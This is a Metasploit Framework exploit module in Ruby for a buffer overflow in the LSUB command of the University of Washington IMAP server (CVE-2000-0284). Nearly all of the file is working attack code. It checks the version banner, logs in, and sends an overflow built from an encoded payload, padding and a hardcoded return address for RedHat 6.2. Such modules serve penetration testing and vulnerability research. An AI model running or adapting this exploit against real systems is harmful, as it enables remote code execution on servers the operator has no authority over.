metasploit-framework/modules/exploits/linux/imap/imap_uw_lsub.rb

89 lines
1.9 KiB
Ruby

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Imap
def initialize(info = {})
super(update_info(info,
'Name' => 'UoW IMAP server LSUB Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'LSUB'
command of the University of Washington IMAP service.
This vulnerability can only be exploited with a valid username
and password.
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '12037' ],
[ 'BID', '1110' ],
[ 'CVE', '2000-0284' ],
[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 964,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'Platform' => 'linux',
'Targets' =>
[
['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
],
'DisclosureDate' => 'Apr 16 2000',
'DefaultTarget' => 0))
end
def check
connect
disconnect
if (banner =~ /IMAP4rev1 v12.264/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect_login
print_status("Sending overflow string...")
req = "a002 LSUB \"\" {1064}\r\n"
sock.put(req)
sleep(2)
sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"
sock.put(sploit)
sleep(2)
handler
disconnect
end
end